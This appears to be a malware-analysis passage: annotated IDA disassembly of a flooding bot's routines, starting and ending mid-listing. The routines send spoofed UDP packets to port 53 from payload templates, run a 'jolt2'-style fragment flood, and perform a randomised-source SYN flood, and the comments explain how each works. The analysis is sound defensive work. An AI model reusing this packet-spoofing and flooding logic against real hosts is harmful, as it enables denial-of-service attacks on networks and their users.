        mov ebx, [ebp+destip]
        cmp dword ptr [ebx], 0
        jnz loc_8049308
loc_8049530: ; CODE XREF: sub_8049174+17Ej
        add [ebp+offset], 32h
        inc edi ; edi++
        cmp edi, 8
        jle inner_loop
        jmp outer_loop
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
bail_out: ; CODE XREF: sub_8049174+AFj
        mov ds:child_pid, 0 ; child_pid = 0
        xor eax, eax ; return 0
        lea esp, [ebp+saved_regs] ; cleanup & restore the stack
        pop ebx ; |
        pop esi ; |
        pop edi ; |
        mov esp, ebp ; |
        pop ebp ; v
        retn
sub_8049174 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; Summary (derived from the code below):
;   Opens a raw socket (PF_INET, SOCK_RAW, protocol 0xFF) and then loops
;   forever sending hand-built IPv4/UDP datagrams to destination port 53.
;   Each pass of inner_loop sends one of nine templates copied from
;   payload_table (50-byte stride, sizes taken from length_table) with the
;   first two payload bytes randomised.  The only exit is socket() failure
;   (child_pid = 0, return 0).
;   Destination: dotted quad built from dstaddr_a..d, or - when use_dsthost is
;     non-zero - gethostbyname(dsthost), looked up again once lookup_counter
;     (reset to 40000, decremented on every paced send) reaches zero.
;   Source address: srcaddr_a..d, or four random bytes when all four are zero.
;   Source port: (srcport_hi << 8) + srcport_lo, or random() % 30000 when both
;     are zero.
;   Despite its name, lookup_step only controls how many packets are sent
;     between usleep(300) pauses.
;   Header traits visible on the wire: IHL 5 / no IP options, TTL 120..249,
;     IP ID 0..254 (stored without a byte swap), UDP checksum field 0.
;   NOTE(review): payload_table itself is not part of this excerpt; given the
;     fixed port 53 the templates are presumably DNS messages - confirm
;     against the data segment.
sub_8049564 proc near ; CODE XREF: main+D72p
saved_regs = dword ptr -698h
var_68C = dword ptr -68Ch ; cursor used by the IP checksum loop
offset = dword ptr -688h ; holds ebp + 50 * template index (see inner_loop)
lookup_counter = dword ptr -684h
lookup_stepper = dword ptr -680h
payload = dword ptr -67Ch
udphdr = dword ptr -678h
sockfd = dword ptr -674h
save_srcaddr_d = dword ptr -670h
save_srcaddr_c = dword ptr -66Ch
save_srcaddr_b = dword ptr -668h
save_srcaddr_a = dword ptr -664h
save_dstaddr_d = dword ptr -660h
save_dstaddr_c = dword ptr -65Ch
save_dstaddr_b = dword ptr -658h
save_dstaddr_a = dword ptr -654h
checksum = word ptr -64Eh
ipaddr = dword ptr -64Ch
dstaddr_buf = byte ptr -648h
buffer = byte ptr -628h
dstaddr = byte ptr -228h
payloads = byte ptr -218h
lengths = dword ptr -24h
dstaddr_a = dword ptr 8
dstaddr_b = dword ptr 0Ch
dstaddr_c = dword ptr 10h
dstaddr_d = dword ptr 14h
srcaddr_a = dword ptr 18h
srcaddr_b = dword ptr 1Ch
srcaddr_c = dword ptr 20h
srcaddr_d = dword ptr 24h
lookup_step = dword ptr 28h
srcport_hi = dword ptr 2Ch
srcport_lo = dword ptr 30h
use_dsthost = dword ptr 34h
dsthost = dword ptr 38h
        push ebp ; initialize stack & preserve registers
        mov ebp, esp ; |
        sub esp, 68Ch ; |
        push edi ; |
        push esi ; |
        push ebx ; v
        ; Only the low byte of each address argument is kept.
        mov bl, byte ptr [ebp+dstaddr_a]
        mov byte ptr [ebp+save_dstaddr_a], bl ; save_dstaddr_a = dstaddr_a
        mov bl, byte ptr [ebp+dstaddr_b]
        mov byte ptr [ebp+save_dstaddr_b], bl ; save_dstaddr_b = dstaddr_b
        mov bl, byte ptr [ebp+dstaddr_c]
        mov byte ptr [ebp+save_dstaddr_c], bl ; save_dstaddr_c = dstaddr_c
        mov bl, byte ptr [ebp+dstaddr_d]
        mov byte ptr [ebp+save_dstaddr_d], bl ; save_dstaddr_d = dstaddr_d
        mov bl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_srcaddr_a], bl ; save_srcaddr_a = srcaddr_a
        mov bl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_srcaddr_b], bl ; save_srcaddr_b = srcaddr_b
        mov bl, byte ptr [ebp+srcaddr_c]
        mov byte ptr [ebp+save_srcaddr_c], bl ; save_srcaddr_c = srcaddr_c
        mov bl, byte ptr [ebp+srcaddr_d]
        mov byte ptr [ebp+save_srcaddr_d], bl ; save_srcaddr_d = srcaddr_d
        lea edi, [ebp+lengths]
        mov esi, offset length_table
        cld
        mov ecx, 9
        repe movsd ; copy 9 dwords (36 bytes): lengths[0..8] = length_table
        lea edi, [ebp+payloads]
        mov esi, offset payload_table
        cld
        mov ecx, 7Dh
        repe movsd ; copy 7Dh dwords (500 bytes): payloads = payload_table
        lea edi, [ebp+buffer] ; iphdr = (struct iphdr *)buffer   (edi for the rest of the routine)
        lea ebx, [ebp+buffer+14h]
        mov [ebp+udphdr], ebx ; udphdr = (struct udphdr *)(buffer + sizeof(struct iphdr))
        lea ebx, [ebp+buffer+1Ch]
        mov [ebp+payload], ebx ; payload = buffer + sizeof(struct iphdr) + sizeof(struct udphdr)
        mov word ptr [ebp+dstaddr], 2 ; dstaddr.sin_family = AF_INET
        mov word ptr [ebp+dstaddr+2], 0 ; dstaddr.sin_port = 0
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049645 ; hostname mode: no dotted-quad string needed
        movzx eax, byte ptr [ebp+save_dstaddr_d]
        push eax ; save_dstaddr_d
        movzx eax, byte ptr [ebp+save_dstaddr_c]
        push eax ; save_dstaddr_c
        movzx eax, byte ptr [ebp+save_dstaddr_b]
        push eax ; save_dstaddr_b
        movzx eax, byte ptr [ebp+save_dstaddr_a]
        push eax ; save_dstaddr_a
        push offset aD_D_D_D ; "%d.%d.%d.%d"
        lea eax, [ebp+dstaddr_buf]
        push eax ; dstaddr_buf
        call sprintf ; sprintf(dstaddr_buf, "%d.%d.%d.%d", save_dstaddr_a, save_dstaddr_b, save_dstaddr_c, save_dstaddr_d)
        add esp, 18h
loc_8049645: ; CODE XREF: sub_8049564+ABj
        cmp [ebp+lookup_step], 0
        jz short loc_804964E
        dec [ebp+lookup_step] ; if (lookup_step) lookup_step--
loc_804964E: ; CODE XREF: sub_8049564+E5j
        push 0FFh ; protocol 0xFF (255 = IPPROTO_RAW)
        push 3 ; SOCK_RAW
        push 2 ; PF_INET
        call socket ; socket(PF_INET, SOCK_RAW, 0xFF)
        mov [ebp+sockfd], eax
        add esp, 0Ch
        test eax, eax
        jle bail_out ; sockfd <= 0: give up (descriptor 0 is treated as failure too)
        mov [ebp+lookup_stepper], 0 ; lookup_stepper = 0
        mov [ebp+lookup_counter], 0 ; lookup_counter = 0
        push 400h
        push 0
        push edi
        call memset ; memset(buffer, 0, 400h)
        add esp, 0Ch
        db 8Dh,76h,0 ; lea esi, [esi+0]
outer_loop: ; CODE XREF: sub_8049564+19Aj ; sub_8049564+46Fj
        xor esi, esi ; esi = 0: "lookup failed, retry" flag
        cmp [ebp+use_dsthost], 0
        jz short loc_80496FC ; address mode: nothing to resolve
        cmp [ebp+lookup_counter], 0
        jg short loc_80496FC ; last lookup result still in use
        mov ebx, [ebp+dsthost]
        push ebx
        call gethostbyname ; gethostbyname(dsthost)
        mov edx, eax
        add esp, 4
        test edx, edx
        jnz short loc_80496CC
        push 600
        call sleep ; sleep(600) after a failed lookup
        mov esi, 1 ; retry from outer_loop
        add esp, 4
        jmp short loc_80496FC
; ---------------------------------------------------------------------------
        align 4
loc_80496CC: ; CODE XREF: sub_8049564+151j
        push 4 ; 4
        lea eax, [ebp+ipaddr]
        push eax ; &ipaddr
        mov eax, [edx+10h]
        mov eax, [eax]
        push eax ; he->h_addr (he->h_addr_list[0])
        call bcopy ; bcopy(he->h_addr, &ipaddr, 4)
        mov eax, [ebp+ipaddr]
        mov [edi+10h], eax ; iphdr->daddr = ipaddr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = ipaddr;
        mov [ebp+lookup_counter], 40000 ; reuse this result for the next 40000 paced sends
        add esp, 0Ch
loc_80496FC: ; CODE XREF: sub_8049564+136j ; sub_8049564+13Fj ...
        test esi, esi
        jnz short outer_loop
        xor esi, esi ; esi = template index i = 0
        mov [ebp+offset], ebp ; offset = frame pointer; the template is addressed below as offset - 218h
inner_loop: ; CODE XREF: sub_8049564+469j
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049723
        lea eax, [ebp+dstaddr_buf]
        push eax
        call inet_addr ; inet_addr(dstaddr_buf)
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = inet_addr(dstaddr_buf)
        add esp, 4
loc_8049723: ; CODE XREF: sub_8049564+1A8j
        mov edx, [ebp+offset]
        add edx, -218h ; edx = &payloads[50 * i]
        mov eax, [ebp+esi*4+lengths]
        push eax ; lengths[i]
        push edx ; payloads + 50 * i
        mov ebx, [ebp+payload]
        push ebx ; payload
        call memcpy ; memcpy(payload, payloads + 50 * i, lengths[i])
        add esp, 0Ch
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov ebx, [ebp+payload]
        mov [ebx], dl ; payload[0] = random() % 255
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov ebx, [ebp+payload]
        mov [ebx+1], dl ; payload[1] = random() % 255
        cmp [ebp+srcport_hi], 0
        jnz short loc_804978C
        cmp [ebp+srcport_lo], 0
        jnz short loc_804978C
        call __random
        mov ebx, 30000
        cdq
        idiv ebx
        mov eax, edx ; no source port given: random() % 30000
        jmp short loc_8049796
; ---------------------------------------------------------------------------
loc_804978C: ; CODE XREF: sub_8049564+20Fj ; sub_8049564+215j
        mov eax, [ebp+srcport_hi]
        shl eax, 8
        add ax, word ptr [ebp+srcport_lo] ; ax = (srcport_hi << 8) + srcport_lo
loc_8049796: ; CODE XREF: sub_8049564+226j
        xchg al, ah ; byte swap to network order
        mov ebx, [ebp+udphdr]
        mov [ebx], ax ; udphdr->source
        mov ebx, [ebp+udphdr]
        mov word ptr [ebx+2], 3500h ; udphdr->dest: bytes 00 35 = port 53 in network order
        mov ax, word ptr [ebp+esi*4+lengths]
        add ax, 8
        xchg al, ah
        mov [ebx+4], ax ; udphdr->len = htons(lengths[i] + 8)
        mov word ptr [ebx+6], 0 ; udphdr->check = 0 (left unset)
        cmp byte ptr [ebp+save_srcaddr_a], 0
        jnz short loc_804983C
        cmp byte ptr [ebp+save_srcaddr_b], 0
        jnz short loc_804983C
        cmp byte ptr [ebp+save_srcaddr_c], 0
        jnz short loc_804983C
        cmp byte ptr [ebp+save_srcaddr_d], 0
        jnz short loc_804983C
        ; Source address 0.0.0.0 was passed in: pick a fresh random one per packet.
        ; Each octet is the low byte of random(), with 0FFh wrapped to 0.
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Ch], dl ; iphdr->saddr, byte 0
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Dh], dl ; iphdr->saddr, byte 1
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Eh], dl ; iphdr->saddr, byte 2
        call __random
        mov dl, al
        cmp dl, 0FFh
        setnb al
        add dl, al
        mov [ebp+buffer+0Fh], dl ; iphdr->saddr, byte 3
        jmp short loc_804986C
; ---------------------------------------------------------------------------
loc_804983C: ; CODE XREF: sub_8049564+265j ; sub_8049564+26Ej ...
        ; Caller-supplied source address: copy it into iphdr->saddr.
        mov bl, byte ptr [ebp+save_srcaddr_a]
        mov [ebp+buffer+0Ch], bl
        mov bl, byte ptr [ebp+save_srcaddr_b]
        mov [ebp+buffer+0Dh], bl
        mov bl, byte ptr [ebp+save_srcaddr_c]
        mov [ebp+buffer+0Eh], bl
        mov bl, byte ptr [ebp+save_srcaddr_d]
        mov [ebp+buffer+0Fh], bl
loc_804986C: ; CODE XREF: sub_8049564+2D6j
        cmp [ebp+use_dsthost], 0
        jnz short loc_80498A2 ; hostname mode: daddr was already set at lookup time
        mov bl, byte ptr [ebp+save_dstaddr_a]
        mov [ebp+buffer+10h], bl ; iphdr->daddr = dstaddr_a.b.c.d
        mov bl, byte ptr [ebp+save_dstaddr_b]
        mov [ebp+buffer+11h], bl
        mov bl, byte ptr [ebp+save_dstaddr_c]
        mov [ebp+buffer+12h], bl
        mov bl, byte ptr [ebp+save_dstaddr_d]
        mov [ebp+buffer+13h], bl
loc_80498A2: ; CODE XREF: sub_8049564+30Cj
        mov byte ptr [edi], 45h ; version 4, header length 5 words
        call __random
        mov ebx, 130
        cdq
        idiv ebx
        add dl, 120
        mov [edi+8], dl ; iphdr->ttl = 120 + random() % 130   (120..249)
        call __random
        mov ebx, 0FFh
        cdq
        idiv ebx
        mov [edi+4], dx ; iphdr->id = random() % 255, stored without a byte swap
        mov byte ptr [edi+9], 11h ; iphdr->protocol = 17 (UDP)
        mov word ptr [edi+6], 0 ; iphdr->frag_off = 0
        mov ax, word ptr [ebp+esi*4+lengths]
        add ax, 1Ch
        xchg al, ah
        mov [edi+2], ax ; iphdr->tot_len = htons(lengths[i] + 1Ch)
        mov word ptr [edi+0Ah], 0 ; iphdr->check = 0 before summing
        ; IP header checksum: one's-complement sum of the 14h header bytes taken
        ; as 16-bit words, folded to 16 bits and inverted.
        mov edx, 14h ; x = sizeof(struct iphdr)
        lea ebx, [ebp+buffer]
        mov [ebp+var_68C], ebx
        xor ecx, ecx ; ecx = running sum
        mov [ebp+checksum], 0
loc_8049904: ; CODE XREF: sub_8049564+3BAj
        mov ebx, [ebp+var_68C]
        movzx eax, word ptr [ebx]
        add ecx, eax
        add ebx, 2
        mov [ebp+var_68C], ebx
        add edx, -2
        cmp edx, 1
        jg short loc_8049904
        jnz short loc_8049933 ; no odd trailing byte (never one for a 14h-byte header)
        mov al, [ebx]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ecx, eax
loc_8049933: ; CODE XREF: sub_8049564+3BCj
        mov edx, ecx
        sar edx, 10h
        movzx eax, cx
        lea ecx, [eax+edx] ; fold: low 16 bits + high 16 bits
        mov eax, ecx
        sar eax, 10h
        add ecx, eax ; add the carry of the fold
        mov eax, ecx
        not ax
        mov [ebp+checksum], ax
        mov [edi+0Ah], ax ; iphdr->check
        push 10h ; sizeof(dstaddr)
        lea eax, [ebp+dstaddr]
        push eax ; &dstaddr
        push 0 ; flags
        mov eax, [ebp+esi*4+lengths]
        add eax, 1Ch
        push eax ; lengths[i] + 1Ch
        lea eax, [ebp+buffer]
        push eax ; buffer
        mov ebx, [ebp+sockfd]
        push ebx ; sockfd
        call sendto ; sendto(sockfd, buffer, lengths[i] + 1Ch, 0, &dstaddr, 10h)
        add esp, 18h
        ; Pacing: usleep(300) after every packet when lookup_step == 0, otherwise
        ; only once lookup_stepper has counted up to lookup_step.
        cmp [ebp+lookup_step], 0
        jnz short loc_8049990
        push 12Ch
        call usleep ; usleep(300)
        jmp short loc_80499AF
; ---------------------------------------------------------------------------
loc_8049990: ; CODE XREF: sub_8049564+41Ej
        mov ebx, [ebp+lookup_step]
        cmp [ebp+lookup_stepper], ebx
        jnz short loc_80499BC
        push 12Ch
        call usleep ; usleep(300)
        mov [ebp+lookup_stepper], 0
loc_80499AF: ; CODE XREF: sub_8049564+42Aj
        dec [ebp+lookup_counter] ; one paced send closer to the next gethostbyname()
        add esp, 4
        jmp short loc_80499C2
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_80499BC: ; CODE XREF: sub_8049564+435j
        inc [ebp+lookup_stepper]
loc_80499C2: ; CODE XREF: sub_8049564+454j
        add [ebp+offset], 50 ; next 50-byte template
        inc esi ; i++
        cmp esi, 8
        jle inner_loop ; templates 0..8
        jmp outer_loop ; then start over: there is no normal exit from this loop
; ---------------------------------------------------------------------------
bail_out: ; CODE XREF: sub_8049564+103j
        mov ds:child_pid, 0 ; child_pid = 0
        xor eax, eax ; return 0;
        lea esp, [ebp+saved_regs] ; cleanup & restore the stack
        pop ebx ; |
        pop esi ; |
        pop edi ; |
        mov esp, ebp ; |
        pop ebp ; v
        retn
sub_8049564 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; Summary (derived from the body, which continues past this line of the listing):
;   Opens a raw socket (PF_INET, SOCK_RAW, protocol 0xFF) and loops forever,
;   sending one pre-built 29-byte IPv4 packet twice per pass and then calling
;   usleep(20).  The only exit is socket() failure.
;   do_udp != 0: protocol 17, UDP header (source port random() % 255,
;                destination port dstport, length field 9) and a payload
;                byte 'a'.
;   do_udp == 0: protocol 1, ICMP type 8 / code 0.
;   Fixed IP header fields: total-length bytes 28 1C, ID bytes 04 55,
;   flags/fragment-offset bytes 1F FE (offset field 1FFEh, MF clear),
;   TTL 120..249.
;   Destination: dstaddr_a..d, or gethostbyname(dsthost) when use_dsthost is
;   non-zero.  Source address: always srcaddr_a..d.
sub_80499F4 proc near ; CODE XREF: main+74Ep
saved_regs = dword ptr -0ACh
ptr_dstaddr = dword ptr -0A0h
pktlen = dword ptr -9Ch
sockfd = dword ptr -98h
save_srcaddr_c = dword ptr -94h
save_srcaddr_b = dword ptr -90h
save_srcaddr_a = dword ptr -8Ch
save_dstaddr_d = dword ptr -88h
save_dstaddr_c = dword ptr -84h
save_dstaddr_b = dword ptr -80h
save_dstaddr_a = dword ptr -7Ch
ipaddr = dword ptr -78h
checksum = word ptr -72h
srcaddr_buf = byte ptr -70h
dstaddr_buf = byte ptr -50h
iphdr = byte ptr -30h
udphdr = word ptr -1Ch ; iphdr + 14h; also holds the ICMP header when do_udp == 0
var_14 = byte ptr -14h ; udphdr + 8: the single payload byte
dstaddr = byte ptr -10h
do_udp = dword ptr 8
dstport = word ptr 0Ch
dstaddr_a = dword ptr 10h
dstaddr_b = dword ptr 14h
dstaddr_c = dword ptr 18h
dstaddr_d = dword ptr 1Ch
srcaddr_a = dword ptr 20h
srcaddr_b = dword ptr 24h
srcaddr_c = dword ptr 28h
srcaddr_d = dword ptr 2Ch
use_dsthost = dword ptr 30h
dsthost = dword ptr 34h
        push ebp ; initialize the stack & preserve registers
        mov ebp, esp ; |
        sub esp, 0A0h ; |
        push edi ; |
        push esi ; |
        push ebx ; v
        mov cl, byte ptr [ebp+dstaddr_a]
        mov byte ptr
[ebp+save_dstaddr_a], cl ; operand of the `mov byte ptr` that ends the previous line
        ; sub_80499F4, continued (header and prologue are on the previous line).
        ; Only the low byte of each address argument is kept.
        mov cl, byte ptr [ebp+dstaddr_b]
        mov byte ptr [ebp+save_dstaddr_b], cl
        mov cl, byte ptr [ebp+dstaddr_c]
        mov byte ptr [ebp+save_dstaddr_c], cl
        mov cl, byte ptr [ebp+dstaddr_d]
        mov byte ptr [ebp+save_dstaddr_d], cl
        mov cl, byte ptr [ebp+srcaddr_a]
        mov byte ptr [ebp+save_srcaddr_a], cl
        mov cl, byte ptr [ebp+srcaddr_b]
        mov byte ptr [ebp+save_srcaddr_b], cl
        mov cl, byte ptr [ebp+srcaddr_c]
        mov byte ptr [ebp+save_srcaddr_c], cl
        mov bl, byte ptr [ebp+srcaddr_d] ; srcaddr_d stays in bl until the sprintf below
        mov word ptr [ebp+dstaddr], 2 ; dstaddr.sin_family = AF_INET
        call __random
        mov ecx, 0FFh
        cdq
        idiv ecx
        mov eax, edx
        xchg al, ah
        mov word ptr [ebp+dstaddr+2], ax ; dstaddr.sin_port = htons(random() % 255)
        movzx eax, bl
        push eax ; srcaddr_d
        movzx eax, byte ptr [ebp+save_srcaddr_c]
        push eax
        movzx eax, byte ptr [ebp+save_srcaddr_b]
        push eax
        movzx eax, byte ptr [ebp+save_srcaddr_a]
        push eax
        push offset aD_D_D_D ; "%d.%d.%d.%d"
        lea esi, [ebp+srcaddr_buf]
        push esi
        call sprintf ; sprintf(srcaddr_buf, "%d.%d.%d.%d", srcaddr a, b, c, d)
        add esp, 18h
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049ABE ; hostname mode: destination is resolved in the send loop
        movzx eax, byte ptr [ebp+save_dstaddr_d]
        push eax
        movzx eax, byte ptr [ebp+save_dstaddr_c]
        push eax
        movzx eax, byte ptr [ebp+save_dstaddr_b]
        push eax
        movzx eax, byte ptr [ebp+save_dstaddr_a]
        push eax
        push offset aD_D_D_D ; "%d.%d.%d.%d"
        lea ebx, [ebp+dstaddr_buf]
        push ebx
        call sprintf ; sprintf(dstaddr_buf, "%d.%d.%d.%d", dstaddr a, b, c, d)
        push ebx
        call inet_addr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = inet_addr(dstaddr_buf)
        add esp, 1Ch
loc_8049ABE: ; CODE XREF: sub_80499F4+94j
        push 0FFh ; protocol 0xFF (255 = IPPROTO_RAW)
        push 3 ; SOCK_RAW
        push 2 ; PF_INET
        call socket ; socket(PF_INET, SOCK_RAW, 0xFF)
        mov [ebp+sockfd], eax
        add esp, 0Ch
        test eax, eax
        jle bail_out ; sockfd <= 0: give up (descriptor 0 is treated as failure too)
        ; The IP header is built once here and reused for every send.
        mov [ebp+iphdr], 45h ; version 4, header length 5 words
        mov word ptr [ebp+iphdr+2], 1C28h ; tot_len field: bytes 28 1C (sendto() below is given pktlen = 29)
        mov word ptr [ebp+iphdr+4], 5504h ; id field: bytes 04 55, constant for every packet
        call __random
        mov ecx, 130
        cdq
        idiv ecx
        add dl, 120
        mov [ebp+iphdr+8], dl ; ttl = 120 + random() % 130, chosen once
        push esi
        call inet_addr
        mov dword ptr [ebp+iphdr+0Ch], eax ; saddr = inet_addr(srcaddr_buf)
        add esp, 4
        cmp [ebp+use_dsthost], 0
        jnz short loc_8049B21
        lea eax, [ebp+dstaddr_buf]
        push eax
        call inet_addr
        mov dword ptr [ebp+iphdr+10h], eax ; daddr = inet_addr(dstaddr_buf)
        add esp, 4
loc_8049B21: ; CODE XREF: sub_80499F4+11Cj
        mov word ptr [ebp+iphdr+6], 0FE1Fh ; frag_off field: bytes 1F FE = offset 1FFEh, MF clear
        ; NOTE(review): the constant ID / fragment-offset pair and the 29-byte
        ; send match what public write-ups describe for the "jolt2" fragment
        ; flood - confirm before relying on that attribution.
        mov word ptr [ebp+iphdr+0Ah], 0 ; check = 0 before summing
        cmp [ebp+do_udp], 0
        jz short loc_8049BB0
        ; --- do_udp != 0: UDP header ---
        mov [ebp+iphdr+9], 11h ; protocol = 17 (UDP)
        call __random
        mov ecx, 0FFh
        cdq
        idiv ecx
        mov eax, edx
        xchg al, ah
        mov [ebp+udphdr], ax ; source port = htons(random() % 255)
        mov ax, [ebp+dstport]
        xchg al, ah
        mov [ebp+udphdr+2], ax ; destination port = htons(dstport)
        mov [ebp+udphdr+4], 900h ; length field: bytes 00 09
        ; Sum of 9 bytes starting at udphdr.  The 9th byte is var_14, which is
        ; written only after the sum, and no pseudo-header is included, so
        ; captured packets may carry a UDP checksum that does not verify.
        mov edx, 9
        lea esi, [ebp+udphdr]
        xor ebx, ebx
        mov [ebp+checksum], 0
loc_8049B6C: ; CODE XREF: sub_80499F4+186j
        movzx eax, word ptr [esi]
        add ebx, eax
        add esi, 2
        add edx, -2
        cmp edx, 1
        jg short loc_8049B6C
        jnz short loc_8049B89
        mov al, [esi] ; odd trailing byte (udphdr + 8)
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ebx, eax
loc_8049B89: ; CODE XREF: sub_80499F4+188j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx] ; fold to 16 bits
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+checksum], ax
        mov [ebp+udphdr+6], ax ; UDP checksum field
        mov [ebp+var_14], 61h ; payload byte 'a'
        jmp short loc_8049C10
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_8049BB0: ; CODE XREF: sub_80499F4+13Dj
        ; --- do_udp == 0: ICMP header in the same 8 bytes ---
        mov [ebp+iphdr+9], 1 ; protocol = 1 (ICMP)
        mov byte ptr [ebp+udphdr], 8 ; ICMP type 8
        mov byte ptr [ebp+udphdr+1], 0 ; ICMP code 0
        mov [ebp+udphdr+2], 0 ; checksum = 0 before summing
        mov edx, 9 ; 9 bytes again; var_14 is never written on this path
        lea esi, [ebp+udphdr]
        xor ebx, ebx
        mov [ebp+checksum], 0
        lea esi, [esi]
loc_8049BD4: ; CODE XREF: sub_80499F4+1EEj
        movzx eax, word ptr [esi]
        add ebx, eax
        add esi, 2
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_8049BD4
        jnz short loc_8049BF1
        mov al, [esi]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ebx, eax
loc_8049BF1: ; CODE XREF: sub_80499F4+1F0j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx]
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+checksum], ax
        mov [ebp+udphdr+2], ax ; ICMP checksum field
loc_8049C10: ; CODE XREF: sub_80499F4+1B8j
        mov [ebp+pktlen], 1Dh ; 29 = 20 (IP) + 8 (UDP/ICMP header) + 1
        ; IP header checksum over 14h bytes.
        mov edx, 14h
        lea esi, [ebp+iphdr]
        xor ebx, ebx
        mov [ebp+checksum], 0
        lea esi, [esi]
loc_8049C2C: ; CODE XREF: sub_80499F4+246j
        movzx eax, word ptr [esi]
        add ebx, eax
        add esi, 2
        add edx, 0FFFFFFFEh
        cmp edx, 1
        jg short loc_8049C2C
        jnz short loc_8049C49
        mov al, [esi]
        mov byte ptr [ebp+checksum], al
        movzx eax, [ebp+checksum]
        add ebx, eax
loc_8049C49: ; CODE XREF: sub_80499F4+248j
        mov edx, ebx
        sar edx, 10h
        movzx eax, bx
        lea ebx, [eax+edx]
        mov eax, ebx
        sar eax, 10h
        add ebx, eax
        mov eax, ebx
        not ax
        mov [ebp+checksum], ax
        mov word ptr [ebp+iphdr+0Ah], ax ; iphdr check (not recomputed when daddr changes below)
        xor ebx, ebx ; ebx = sends left before the next hostname lookup
        lea ecx, [ebp+dstaddr]
        mov [ebp+ptr_dstaddr], ecx
        lea edi, [ebp+iphdr] ; edi = packet start
        lea esi, [esi]
loc_8049C78: ; CODE XREF: sub_80499F4+32Aj
        xor esi, esi ; esi = "lookup failed, skip this send" flag
        cmp [ebp+use_dsthost], 0
        jz short loc_8049CCE
        test ebx, ebx
        jg short loc_8049CCE
        mov ecx, [ebp+dsthost]
        push ecx
        call gethostbyname ; gethostbyname(dsthost)
        mov edx, eax
        add esp, 4
        test edx, edx
        jnz short loc_8049CAC
        push 600
        call sleep ; sleep(600) after a failed lookup
        mov esi, 1
        add esp, 4
        jmp short loc_8049CCE
; ---------------------------------------------------------------------------
        db 8Dh, 36h
; ---------------------------------------------------------------------------
loc_8049CAC: ; CODE XREF: sub_80499F4+2A0j
        push 4
        lea eax, [ebp+ipaddr]
        push eax
        mov eax, [edx+10h]
        mov eax, [eax]
        push eax
        call bcopy ; bcopy(he->h_addr_list[0], &ipaddr, 4)
        mov eax, [ebp+ipaddr]
        mov dword ptr [ebp+iphdr+10h], eax ; iphdr daddr = ipaddr
        mov dword ptr [ebp+dstaddr+4], eax ; dstaddr.sin_addr.s_addr = ipaddr
        mov ebx, 40000 ; reuse this result for the next 40000 passes
        add esp, 0Ch
loc_8049CCE: ; CODE XREF: sub_80499F4+28Aj ; sub_80499F4+28Ej ...
        test esi, esi
        jnz short loc_8049D1D
        ; The same packet is sent twice back to back.
        push 10h
        mov ecx, [ebp+ptr_dstaddr]
        push ecx
        push 0
        mov ecx, [ebp+pktlen]
        push ecx
        push edi
        mov ecx, [ebp+sockfd]
        push ecx
        call sendto ; sendto(sockfd, iphdr, pktlen, 0, &dstaddr, 10h)
        push 10h
        mov ecx, [ebp+ptr_dstaddr]
        push ecx
        push 0
        mov ecx, [ebp+pktlen]
        push ecx
        push edi
        mov ecx, [ebp+sockfd]
        push ecx
        call sendto ; sendto(sockfd, iphdr, pktlen, 0, &dstaddr, 10h)
        add esp, 30h
        push 20
        call usleep ; usleep(20)
        add esp, 4
loc_8049D1D: ; CODE XREF: sub_80499F4+2DCj
        dec ebx
        jmp loc_8049C78 ; unconditional: there is no normal exit from this loop
; ---------------------------------------------------------------------------
        align 4
bail_out: ; CODE XREF: sub_80499F4+E3j
        mov ds:child_pid, 0 ; child_pid = 0;
        xor eax, eax ; return 0;
        lea esp, [ebp+saved_regs] ; cleanup & restore the stack
        pop ebx ; |
        pop esi ; |
        pop edi ; |
        mov esp, ebp ; |
        pop ebp ; v
        retn
sub_80499F4 endp
; ---------------------------------------------------------------------------
        db 8Dh, 76h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame hidden
;
; Summary (derived from the body, which continues past this line of the listing):
;   Seeds the PRNG with time(0), opens a raw socket (PF_INET, SOCK_RAW,
;   protocol 0xFF) and loops forever sending 40-byte IPv4/TCP segments (no
;   options, no payload) with only the SYN flag set, to destination port
;   (dstport_hi << 8) + dstport_lo.  The only exit is socket() failure.
;   Randomised per packet: IP ID 512..3600, TTL 125..240, TCP window
;   200..1600, source port 1..40000, sequence number 1..40000000.
;   Source address: srcaddr_a..d when use_srcaddr != 0, otherwise four
;   random() % 255 octets regenerated for every packet.
;   Destination: dstaddr_a..d, or gethostbyname(dsthost) when use_dsthost != 0.
;   lookup_step only controls how many packets are sent between usleep(300)
;   pauses.
sub_8049D40 proc near ; CODE XREF: main+BC4p main+C9Ep
saved_regs = dword ptr -0D8h
internal1 = dword ptr -0CCh ; retry flag in the lookup code, checksum cursor later
